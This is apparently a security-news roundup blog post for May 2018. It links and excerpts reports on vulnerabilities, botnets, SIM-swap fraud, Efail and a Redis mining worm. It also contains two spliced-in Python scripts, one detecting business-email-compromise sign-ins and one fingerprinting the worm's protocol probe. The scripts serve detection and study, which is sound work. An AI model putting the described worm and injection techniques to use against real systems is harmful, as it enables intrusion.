Cyber security May 2018

This posting is here to collect security alert news in May 2018.

I post links to security vulnerability news in the comments of this article.

 


  1. Tomi Engdahl says:

    Adobe Reader zero-day discovered alongside Windows vulnerability
    https://blog.malwarebytes.com/threat-analysis/2018/05/adobe-reader-zero-day-discovered-alongside-windows-vulnerability/

    During the first half of 2018, we have witnessed some particularly interesting zero-day exploits, including one for Flash (CVE-2018-4878) and more recently for Internet Explorer (CVE-2018-8174). The former was quickly used by exploit kits such as Magnitude, while it is only a matter of time before we see the latter being weaponized more widely.

    We can now add to that list an Adobe Reader zero-day (CVE-2018-4990), which was reported by ESET and Microsoft and has already been patched. Although it has not been observed in the wild yet, it remains a dangerous threat considering it is coupled with a privilege escalation vulnerability in Microsoft Windows.

    Reply
  2. Tomi Engdahl says:

    Some Firefox Screenshots End Up Publicly Accessible
    https://www.securityweek.com/firefox-saves-screenshots-publicly-accessible-cloud-servers

    Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.

    Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.

    Reply
  3. Tomi Engdahl says:

    U.S. Jury Convicts Operator of Counter AV Service Scan4You
    https://www.securityweek.com/us-jury-convicts-operator-counter-av-service-scan4you

    A 37-year-old Latvian resident was convicted by a U.S. jury on Wednesday for his role in the operation of a counter antivirus service named Scan4You. Sentencing is scheduled for September 21.

    Bondars and Martisevs were accused of running the Scan4You service, which helped cybercriminals test their malware to ensure that it would not be detected by cybersecurity products.

    Bondars was convicted on Wednesday on one count of conspiracy to violate the Computer Fraud and Abuse Act (CFAA), one count of conspiracy to commit wire fraud, and one count of computer intrusion with intent to cause damage and aiding and abetting.

    Reply
  4. Tomi Engdahl says:

    Critical Code Execution Flaws Patched in Advantech WebAccess
    https://www.securityweek.com/critical-code-execution-flaws-patched-advantech-webaccess

    Taiwan-based industrial automation company Advantech has released an update for its WebAccess product to address nearly a dozen vulnerabilities, including critical flaws that allow arbitrary code execution.

    Advantech WebAccess is a browser-based software package for human-machine interfaces (HMI) and supervisory control and data acquisition (SCADA) systems. The product is used in the United States, Europe and East Asia in the energy, critical manufacturing, and water and wastewater sectors.

    Reply
  5. Tomi Engdahl says:

    Auth0 Secures $55 Million in New Funding Round
    https://www.securityweek.com/auth0-secures-55-million-new-funding-round

    Identity-as-a-Service (IDaaS) company Auth0 this week announced $55 million in Series D funding led by Sapphire Ventures.

    Reply
  6. Tomi Engdahl says:

    Critical Command Injection Flaw Patched in Red Hat Linux
    https://www.securityweek.com/critical-command-injection-flaw-patched-red-hat-linux

    A critical vulnerability in the DHCP client in Red Hat Enterprise Linux could allow an attacker to execute arbitrary commands on impacted systems.

    Tracked as CVE-2018-1111, the security flaw was reported by Felix Wilhelm from Google’s Security Team. The bug was discovered in the NetworkManager integration script included in the DHCP client packages.

    The vulnerability features a CVSS3 Base Score of 7.5 and can be exploited without special privileges. However, an attacker targeting the bug could execute arbitrary commands with root privileges on vulnerable Red Hat systems.

    The DHCP client package in Red Hat includes a script for the NetworkManager component. The script is executed each time NetworkManager receives a DHCP response from a DHCP server. Thus, a malicious DHCP response could be used to cause the script to execute arbitrary shell commands.

    “A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol,” Red Hat explains.

    https://access.redhat.com/security/cve/cve-2018-1111

    Reply
  7. Tomi Engdahl says:

    NHS cyber-hero ‘discussed bank hack role’
    http://www.bbc.com/news/technology-44139467

    The British cyber-security expert credited with thwarting a major ransomware attack is attempting to prevent a phone call transcript being used against him in the US courts.

    The document quotes Marcus Hutchins as saying that he wrote code for an unidentified third-party, who then used it to make bank-hacking software.

    Mr Hutchins has been accused of creating and distributing the password-stealing malware Kronos.

    He has denied the charges.

    The Ilfracombe, Devon-based researcher rose to prominence a year ago when he halted the Wannacry ransomware attack.

    “So, I wrote code for a guy a while back who then incorporated it into a banking malware,” Mr Hutchins is quoted as saying during the phone call after his arrest.

    Reply
  8. Tomi Engdahl says:

    Zack Whittaker / ZDNet:
    A bug in the website of LocationSmart, which sells real-time phone location data, let anyone track people’s locations across North America without consent — The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time. — A company that collects the real …

    Cell phone tracking firm exposed millions of Americans’ real-time locations
    https://www.zdnet.com/article/cell-phone-tracking-firm-exposed-millions-of-americans-real-time-locations/

    The bug allowed one Carnegie Mellon researcher to track anyone’s cell phone in real time.

    A company that collects the real-time location data on millions of cell phone customers across North America had a bug in its website that allowed anyone to see where a person is located — without obtaining their consent.

    Earlier this week, we reported that four of the largest cell giants in the US are selling your real-time location data to a company that you’ve probably never heard about before.

    The company, LocationSmart, is a data aggregator and claims to have “direct connections” to cell carriers to obtain locations from nearby cell towers. The site had its own “try-before-you-buy” page that lets you test the accuracy of its data. The page required explicit consent from the user before their location data can be used by sending a one-time text message to the user. When we tried with a colleague, we tracked his phone to a city block of his actual location.

    But that website had a bug that allowed anyone to track someone’s location silently without their permission.

    Reply
  9. Tomi Engdahl says:

    US cell carriers are selling access to your real-time phone location data
    https://www.zdnet.com/article/us-cell-carriers-selling-access-to-real-time-location-data/

    The company embroiled in a privacy row has “direct connections” to all major US wireless carriers, including AT&T, Verizon, T-Mobile, and Sprint — and Canadian cell networks, too.

    Reply
  10. Tomi Engdahl says:

    One in four APAC firms not sure if they suffered security breach
    https://www.zdnet.com/article/one-in-four-apac-firms-not-sure-if-they-suffered-security-breach/

    A quarter of Asia-Pacific companies have experienced a security incident, while 27 percent aren’t even sure because they haven’t conducted any data breach assessment – even as the region is estimated to have lost US$1.75 trillion last year due to cyberattacks.

    Reply
  11. Tomi Engdahl says:

    Mirai botnet adds three new attacks to target IoT devices
    https://www.zdnet.com/article/mirai-botnet-adds-three-new-attacks-to-target-iot-devices/

    This new version of the botnet uses exploits instead of brute force attacks to gain control of unpatched devices.

    Reply
  12. Tomi Engdahl says:

    Lily Hay Newman / Wired:
    Operator of malware-testing service Scan4You, which helped hackers evade antivirus software, convicted by US jury after Trend Micro gave data to the FBI — Most antivirus scanners play a classic cat and mouse game: They work by checking software against a frequently updated list of potential threats.
    https://www.wired.com/story/inside-scan4you-takedown

    Reply
  13. Tomi Engdahl says:

    Music Business Worldwide:
    After reports that Tidal is inflating streaming numbers for big stars and is late paying royalties, company hires cybersecurity firm to investigate breach

    TIDAL investigates ‘potential data breach’ following fake streams accusation
    https://www.musicbusinessworldwide.com/tidal-investigates-potential-data-breach-following-accusations-of-fake-streams/

    Under-fire streaming platform TIDAL has announced that it has enlisted an “independent, third party cyber-security firm” to investigate a potential data breach at the company.

    Its reason for doing so, however, is slightly confusing: the platform strongly denies claims recently made by Norwegian financial newspaper Dagens Næringsliv, which suggest that the accounts of TIDAL subscribers were manipulated in 2016 to falsely bulk up streaming numbers allocated to Kanye West’s The Life Of Pablo and Beyoncé’s Lemonade.

    Reply
  14. Tomi Engdahl says:

    Cyrus Farivar / Ars Technica:
    Alleged owners of Mugshots.com, a site that publishes mugshots and demands payment for removal, arrested on extortion, money laundering, identity theft charges

    All of Mugshots.com’s alleged co-owners arrested on extortion charges
    https://arstechnica.com/tech-policy/2018/05/all-of-mugshots-coms-alleged-co-owners-arrested-on-extortion-charges/

    Mugshots.com is a “business permeated with fraud,” California AG says.

    Reply
  15. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    McAfee report: North Korea-linked hackers posted three apps on Google Play to steal personal info from defectors; hackers made contact with targets via Facebook

    North Korea-tied hackers used Google Play and Facebook to infect defectors
    Apps hosted in Google market for two months were spread over Facebook.
    https://arstechnica.com/information-technology/2018/05/north-korea-tied-hackers-use-google-play-and-facebook-to-infect-defectors/

    Researchers said a team of hackers tied to North Korea recently managed to get the Google Play market to host at least three Android apps designed to surreptitiously steal personal information from defectors of the isolated nation.

    The three apps first appeared in the official Android marketplace in January and weren’t removed until March when Google was privately notified. That’s according to a blog post published Thursday by researchers from security company McAfee. Two apps masqueraded as security apps, and a third purported to provide information about food ingredients. Hidden functions caused them to steal device information and allow them to receive additional executable code that stole personal photos, contact lists, and text messages.

    The apps were spread to selected individuals, in many cases by contacting them over Facebook. The apps had about 100 downloads when Google removed them.

    https://securingtomorrow.mcafee.com/mcafee-labs/malware-on-google-play-targets-north-korean-defectors/

    Reply
  16. Tomi Engdahl says:

    Patrick Winn / GlobalPost Investigations:
    Interviews with experts and defectors detail North Korea’s Reconnaissance General Bureau, whose hackers are estimated to have stolen $650M+ — The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews.

    How North Korean hackers became the world’s greatest bank robbers
    https://gpinvestigations.pri.org/how-north-korean-hackers-became-the-worlds-greatest-bank-robbers-492a323732a6

    The Reconnaissance General Bureau, North Korea’s equivalent to the CIA, has trained up the world’s greatest bank-robbing crews. In just the past few years, RGB hackers have struck more than 100 banks and cryptocurrency exchanges around the world, pilfering more than $650 million. That we know of.

    Reply
  17. Tomi Engdahl says:

    Chance Miller / 9to5Mac:
    Apple is telling developers to remove CallKit from apps listed in App Store in China after government request, likely because of CallKit’s VoIP functionalities — Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps …

    Apple cracking down on CallKit apps in China App Store due to government regulation
    https://9to5mac.com/2018/05/19/apple-cracking-down-on-callkit-apps-in-china-app-store-due-to-government-regulation/

    Apple has started cracking down on yet another type of application in China. Following the earlier removal of VPN apps, the company is now removing applications that use the CallKit framework. The move comes in response to newly enforced regulation from the Chinese Ministry of Industry and Information Technology, according to a message obtained by 9to5Mac…

    Reply
  18. Tomi Engdahl says:

    UK to introduce internet safety laws within ‘next couple of years’
    Social networks may be on the hook for exposing kids to online bullying.
    https://www.engadget.com/2018/05/20/uk-plans-internet-safety-laws/

    Reply
  19. Tomi Engdahl says:

    T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account
    https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/

    T-Mobile is investigating a retail store employee who allegedly made unauthorized changes to a subscriber’s account in an elaborate scheme to steal the customer’s three-letter Instagram username. The modifications, which could have let the rogue employee empty bank accounts associated with the targeted T-Mobile subscriber, were made even though the victim customer already had taken steps recommended by the mobile carrier to help minimize the risks of account takeover. Here’s what happened, and some tips on how you can protect yourself from a similar fate.

    Earlier this month, KrebsOnSecurity heard from Paul Rosenzweig, a 27-year-old T-Mobile customer from Boston who had his wireless account briefly hijacked.

    So-called “port out” scams allow crooks to intercept your calls and messages while your phone goes dark. Porting a number to a new provider shuts off the phone of the original user, and forwards all calls to the new device. Once in control of the mobile number, thieves who have already stolen a target’s password(s) can request any second factor that is sent to the newly activated device, such as a one-time code sent via text message or an automated call that reads the one-time code aloud.

    A SIM swap is a legitimate process by which a customer can request that a new SIM card (the tiny, removable chip in a mobile device that allows it to connect to the provider’s network) be added to the account. Customers can request a SIM swap when their existing SIM card has been damaged, or when they are switching to a different phone that requires a SIM card of another size.

    However, thieves and other ne’er-do-wells can abuse this process by posing as a targeted mobile customer or technician and tricking employees at the mobile provider into swapping in a new SIM card for that customer on a device that they control. If successful, the SIM swap accomplishes more or less the same result as a number port out (at least in the short term) — effectively giving the attackers access to any text messages or phone calls that are sent to the target’s mobile account.

    Reply
  20. Tomi Engdahl says:

    Chrome to Issue Red “Not Secure” Warning for HTTP
    https://www.securityweek.com/chrome-issue-red-not-secure-warning-http

    Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.

    The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.

    Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.

    Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.

    At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.

    “Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.

    Reply
  21. Tomi Engdahl says:

    Hacked Drupal Sites Deliver Miners, RATs, Scams
    https://www.securityweek.com/hacked-drupal-sites-deliver-miners-rats-scams

    The Drupal websites hacked by cybercriminals using the vulnerabilities known as Drupalgeddon2 and Drupalgeddon3 deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

    Two highly critical flaws were patched in recent months in the Drupal content management system (CMS). The security holes are tracked as CVE-2018-7600 and CVE-2018-7602, and they both allow remote code execution.

    Malicious actors started exploiting CVE-2018-7600, dubbed Drupalgeddon2, roughly two weeks after a patch was released and shortly after a proof-of-concept (PoC) exploit was made public.

    CVE-2018-7602, dubbed Drupalgeddon 3, was discovered during an analysis of CVE-2018-7600 by the Drupal Security Team and developer Jasper Mattsson, who also reported the original vulnerability. Hackers started exploiting CVE-2018-7602 immediately after the release of a patch.

    Reply
  22. Tomi Engdahl says:

    Two Vulnerabilities Patched in BIND DNS Software
    https://www.securityweek.com/two-vulnerabilities-patched-bind-dns-software

    Updates announced on Friday by the Internet Systems Consortium (ISC) for BIND, the most widely used Domain Name System (DNS) software, patch a couple of vulnerabilities.

    While attackers may be able to exploit both of the flaws remotely for denial-of-service (DoS) attacks, the security holes have been assigned only a “medium” severity rating.

    One of the vulnerabilities, tracked as CVE-2018-5737, can allow a remote attacker to cause operational problems, including degradation of the service or a DoS condition.

    The vulnerability impacts BIND 9.12.0 and 9.12.1 if the server is configured to allow recursion to clients and the max-stale-ttl parameter has a value other than zero. The issue has been patched in BIND 9.12.1-P2, but workarounds are also available.

    Reply
  23. Tomi Engdahl says:

    Man Sentenced to 15 Years in Prison for DDoS Attacks, Firearm Charges
    https://www.securityweek.com/man-sentenced-15-years-prison-ddos-attacks-firearm-charges

    A New Mexico man has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

    John Kelsey Gammell, 55, used several so-called booter services to launch cyberattacks, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser. His targets included former employers, business competitors, companies that refused to hire him, colleges, law enforcement agencies, courts, banks, and telecoms firms.

    Reply
  24. Tomi Engdahl says:

    More Charges Against ‘Syrian Electronic Army’ Hackers
    https://www.securityweek.com/more-charges-against-syrian-electronic-army-hackers

    The U.S. Justice Department on Thursday announced more charges against two Syrian nationals believed to be members of the “Syrian Electronic Army” hacker group.

    Ahmad ‘Umar Agha, 24, known online as “The Pro,” and Firas Dardar, 29, known online as “The Shadow,” have been indicted on 11 counts of conspiracy to commit computer fraud, conspiracy to commit wire fraud, and aggravated identity theft.

    Reply
  25. Tomi Engdahl says:

    “Wicked” Variant of Mirai Botnet Emerges
    https://www.securityweek.com/wicked-variant-mirai-botnet-emerges

    A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributes a new bot, Fortinet researchers warn.

    Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.

    The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.

    Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.

    Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.

    A Wicked Family of Bots
    https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html

    Reply
  26. Tomi Engdahl says:

    Phishing Roundup: Caracal, Stealth Mango, Tangelo, Apple, DHL, eFax & More
    https://www.bleepingcomputer.com/news/security/phishing-roundup-caracal-stealth-mango-tangelo-apple-dhl-efax-and-more/

    Phishing takes place when a fraudster tricks an individual into sharing sensitive information (account numbers, Social Security numbers, login credentials, etc.) by way of fraudulent emails, texts, or counterfeit websites. Phishing can also enable a scammer to gain access to a computer or network so that they can install malware, such as ransomware, on a victim’s computer. Phishers are able to achieve this by spoofing the familiar, trusted logos of established, legitimate companies. Or, they may pose as a friend or family member and are often successful in completely deluding their targets.

    Reply
  27. Tomi Engdahl says:

    Business Email Compromise incidents
    https://isc.sans.edu/forums/diary/Business+Email+Compromise+incidents/23669/

    Over the past 12 months we have seen a sharp increase in the number of incidents relating to the compromise of business emails. Often O365, but also some Gmail and on premise systems with webmail access.

    The objective is simple: use the system to convince the organisation, or a customer of the organisation, to pay a fake invoice and transfer the money overseas. The average net of these breaches is around $85,000, but there have been cases well into the 7 figures. So quite worthwhile for the attacker. Most organisations are not set up to prevent or detect this kind of attack until it is too late.

    Whilst similar to whaling emails, the approach is more thought out and structured. The attacks are typically targeted. There are two scenarios we usually see:

    1. Compromise victim company, identify invoices to be paid by the victim, spoof the company to be paid and convince the victim to pay to an incorrect account.
    2. Compromise victim company, identify customer invoices to be paid to the victim, spoof the victim and convince customers to pay invoices into an incorrect account.

    There are a few opportunities to detect or prevent these kinds of attacks:

    Prevent
    - Have a robust payment-changing process: validate using details you have in your database and call them, regardless of whether someone called you.
    - Don’t pay to overseas accounts, especially when previous invoices were paid within the country.
    - Check previous payments: where did they go, is this different? If so, halt the payment.
    - Disallow forwarding rules to external addresses. This won’t stop it, but does make it more difficult.
    - Multi-factor authentication (MFA) on mail.
    Detect
    - Logins from locations other than your office.
    - Logins where the IP address changes. We see many use open proxies when logging into a victim account; in logs that looks like the person travels rapidly across the globe.
    - Regularly interrogate rules created in the email product. This is often how we find the other compromised accounts.

    Reply
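    The two detection signals the diary lists (sign-ins from non-office locations or with physically impossible IP changes, and forwarding rules to external addresses) as an added example, not code from the ISC diary. The log format, office country, internal mail domain and speed threshold are constructed assumptions; real O365/Gmail audit exports will need their own field mapping.

```python
"""Detections for the BEC signals in the diary: sign-ins from non-office
locations, impossible travel between consecutive sign-ins, and mailbox
rules that forward to external domains. All inputs are constructed samples."""
import math
from datetime import datetime

OFFICE_COUNTRIES = {"AU"}           # assumption: where the organisation's offices are
INTERNAL_DOMAINS = {"example.com"}  # assumption: the organisation's own mail domains
MAX_SPEED_KMH = 900.0               # faster than an airliner => impossible travel

# Constructed sign-in log: timestamp, user, source IP, country, latitude, longitude
SIGNIN_LOG = """\
2018-05-20T08:02:11Z alice@example.com 203.0.113.10 AU -33.87 151.21
2018-05-20T08:40:55Z alice@example.com 198.51.100.7 NG 6.52 3.38
2018-05-20T09:15:03Z bob@example.com 203.0.113.11 AU -33.87 151.21
2018-05-20T17:30:00Z bob@example.com 203.0.113.11 AU -33.87 151.21
"""

# Constructed mailbox-rule export: user, quoted rule name, forward-to address or "-"
MAILBOX_RULES = """\
alice@example.com "Invoices" finance-archive@mailbox-relay.test
bob@example.com "Move newsletters" -
"""


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def parse_signins(text):
    """Turn the whitespace-separated log into event dicts with parsed timestamps."""
    events = []
    for line in text.splitlines():
        ts, user, ip, country, lat, lon = line.split()
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "user": user,
                       "ip": ip, "country": country, "lat": float(lat), "lon": float(lon)})
    return events


def detect_signin_anomalies(events):
    """Return alert tuples: non-office country, and impossible travel between
    consecutive sign-ins of the same user (distance / elapsed time)."""
    alerts = []
    last = {}
    for e in sorted(events, key=lambda x: (x["user"], x["ts"])):
        if e["country"] not in OFFICE_COUNTRIES:
            alerts.append(("non_office_location", e["user"], e["ip"], e["country"]))
        prev = last.get(e["user"])
        if prev and prev["ip"] != e["ip"]:
            km = haversine_km(prev["lat"], prev["lon"], e["lat"], e["lon"])
            hours = (e["ts"] - prev["ts"]).total_seconds() / 3600.0
            speed = km / hours if hours > 0 else float("inf")
            if speed > MAX_SPEED_KMH:
                alerts.append(("impossible_travel", e["user"], prev["ip"], e["ip"], round(speed)))
        last[e["user"]] = e
    return alerts


def detect_external_forwarding(text):
    """Flag rules whose forward-to address is outside the organisation's domains."""
    alerts = []
    for line in text.splitlines():
        user, rest = line.split(" ", 1)
        name, target = rest.rsplit(" ", 1)
        if target != "-" and target.split("@")[-1].lower() not in INTERNAL_DOMAINS:
            alerts.append(("external_forward", user, name.strip('"'), target))
    return alerts


if __name__ == "__main__":
    for alert in detect_signin_anomalies(parse_signins(SIGNIN_LOG)):
        print(alert)
    for alert in detect_external_forwarding(MAILBOX_RULES):
        print(alert)
```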
  28. Tomi Engdahl says:

    Anatomy of a Redis mining worm
    https://isc.sans.edu/forums/diary/Anatomy+of+a+Redis+mining+worm/23673/

    Publicly accessible Redis servers have been exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days, we’ve seen 173 unique IP addresses that have been infected with this worm, whereof 88% of the infected servers are located in China, 4% in the US and 4% in Hong Kong.

    The worm searches for open Redis servers (port 6379), configures cron to download itself every few minutes (using a file upload service), starts mining and finally looks for new targets. It will send the payload “*1\r\n$4\r\nINFO\r\n” and check the response for the string “os:Linux”, to prevent replication to other operating systems.

    When the cron job executes, the worm will disable security, close the existing publicly open Redis port using iptables, disable SELinux and disable caching. If there are miners running, they will be killed and the cryptonight miner starts. The worm is taking advantage of public file hosting, in this case, transfer.sh, to replicate itself. Transfer.sh removes files after 14 days, which is assumed to be the reason that a copy will be made on each replication.

    Reply
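    A parser for the RESP wire format the worm speaks, used to fingerprint its replication probe (the bare INFO command and a reply carrying "os:Linux") in honeypot captures. This is an added example, not the diary's or the worm's code; the client stream and server reply bytes are constructed samples.

```python
"""Parse RESP (the Redis protocol) from captured port-6379 traffic and flag the
worm's probe: a one-element array holding INFO, answered with os:Linux.
Byte strings below are constructed samples, not real captures."""

# Constructed client stream: the worm's probe followed by an unrelated command.
CLIENT_STREAM = b"*1\r\n$4\r\nINFO\r\n*2\r\n$3\r\nGET\r\n$3\r\nfoo\r\n"
# Constructed INFO reply (bulk string), trimmed to the fields that matter here.
INFO_BODY = b"# Server\r\nredis_version:4.0.9\r\nos:Linux 4.4.0 x86_64\r\n"
SERVER_REPLY = b"$%d\r\n%s\r\n" % (len(INFO_BODY), INFO_BODY)

_INCOMPLETE = object()  # sentinel: more bytes are needed to finish a value


def _read_line(buf, pos):
    """Return (line_without_crlf, position_after_crlf) or (None, pos)."""
    end = buf.find(b"\r\n", pos)
    if end < 0:
        return None, pos
    return buf[pos:end], end + 2


def _parse_one(buf, pos):
    """Parse one RESP value starting at pos; return (value, next_pos)."""
    if pos >= len(buf):
        return _INCOMPLETE, pos
    kind = buf[pos:pos + 1]
    if kind not in (b"+", b"-", b":", b"$", b"*"):
        # Inline command (no type byte): whitespace-separated words on one line.
        line, nxt = _read_line(buf, pos)
        if line is None:
            return _INCOMPLETE, pos
        return line.decode("utf-8", "replace").split(), nxt
    line, nxt = _read_line(buf, pos + 1)
    if line is None:
        return _INCOMPLETE, pos
    if kind in (b"+", b"-"):          # simple string / error
        return line.decode("utf-8", "replace"), nxt
    if kind == b":":                  # integer
        return int(line), nxt
    if kind == b"$":                  # bulk string: $<len>\r\n<bytes>\r\n
        n = int(line)
        if n < 0:                     # null bulk string
            return None, nxt
        if len(buf) < nxt + n + 2:
            return _INCOMPLETE, pos
        return buf[nxt:nxt + n].decode("utf-8", "replace"), nxt + n + 2
    n = int(line)                     # array: *<count> followed by <count> values
    items, cur = [], nxt
    for _ in range(n):
        item, cur = _parse_one(buf, cur)
        if item is _INCOMPLETE:
            return _INCOMPLETE, pos
        items.append(item)
    return items, cur


def parse_resp(buf):
    """Parse every complete RESP value in buf; return (values, unconsumed_bytes)."""
    values, pos = [], 0
    while pos < len(buf):
        val, new_pos = _parse_one(buf, pos)
        if val is _INCOMPLETE:
            break
        values.append(val)
        pos = new_pos
    return values, buf[pos:]


def is_worm_probe(commands, reply_values):
    """True when the client sent a bare INFO and the reply advertises a Linux
    host, the condition the worm checks before replicating to a target."""
    probe = any(isinstance(c, list) and [str(s).upper() for s in c] == ["INFO"]
                for c in commands)
    linux = any(isinstance(v, str) and "os:Linux" in v for v in reply_values)
    return probe and linux


if __name__ == "__main__":
    cmds, _ = parse_resp(CLIENT_STREAM)
    reply, _ = parse_resp(SERVER_REPLY)
    print(cmds, is_worm_probe(cmds, reply))
```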
  29. Tomi Engdahl says:

    Was the Efail disclosure horribly screwed up?
    https://blog.cryptographyengineering.com/2018/05/17/was-the-efail-disclosure-horribly-screwed-up/

    On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction.

    By the standards of cryptographic vulnerabilities, this is about as bad as things get. In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker-controlled server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients.

    The big (and largely under-reported) story of EFail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) is probably the most widely-used email encryption protocol in the corporate world.

    Efail also happens to affect a smaller, but non-trivial number of OpenPGP-compatible clients.

    How Efail was disclosed to the PGP community

    Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us.

    Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding.

    All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story.

    There are three basic accusations going around about the Efail disclosure. They can be summarized as (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway so what’s the big deal.

    A unified timeline of Efail PGP disclosure events
    http://flaked.sockpuppet.org/2018/05/16/a-unified-timeline.html

    Reply
  30. Tomi Engdahl says:

    Insecure Claymore Miner Management API Exploited in the Wild
    https://isc.sans.edu/forums/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665/

    We have seen a notable increase in scans for port 3333/tcp in the wild. Port 3333 is used by a variety of crypto coin miners and mining pools.

    Reply
  31. Tomi Engdahl says:

    200 Million Sets of Japanese PII Emerge on Underground Forums
    https://www.securityweek.com/200-million-sets-japanese-pii-emerge-underground-forums

    A dataset allegedly containing 200 million unique sets of personally identifiable information (PII) exfiltrated from several popular Japanese website databases emerged on underground forums, FireEye reports.

    Advertised by a Chinese threat actor at around $150, the dataset contained names, credentials, email addresses, dates of birth, phone numbers, and home addresses, and was initially spotted in December 2017.

    The data appears sourced from a variety of Japanese websites, including those in the retail, food and beverage, financial, entertainment, and transportation sectors, and FireEye believes that the cybercriminals obtained it via opportunistic compromises.

    Reply
  32. Tomi Engdahl says:

    Misconfigured CalAmp Server Enabled Vehicle Takeover
    https://www.securityweek.com/misconfigured-calamp-server-enabled-vehicle-takeover

    A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.

    The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.

    The researchers discovered that the application uses an SSL connection and uses SSL pinning to prevent tampering.

    Reply
  33. Tomi Engdahl says:

    DHS Publishes New Cybersecurity Strategy
    https://www.securityweek.com/dhs-publishes-new-cybersecurity-strategy

    The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.

    The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide “the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient.”

    https://www.dhs.gov/sites/default/files/publications/DHS-Cybersecurity-Strategy_1.pdf

    Reply
  34. Tomi Engdahl says:

    Tara Francis Chan / Business Insider:
    Chinese state-run media says the country’s social credit system has blocked people from taking over 11M flights and 4M train trips; full rollout coming by 2020
    http://www.businessinsider.com/china-social-credit-system-blocked-people-taking-flights-train-trips-2018-5?op=1

    Reply
  35. Tomi Engdahl says:

    Zack Whittaker / ZDNet:
    TeenSafe, an app for parents to monitor kids’ phone use, stored some app login passwords and kids’ Apple ID credentials in plaintext on an unsecured AWS server

    Teen phone monitoring app leaked thousands of user passwords
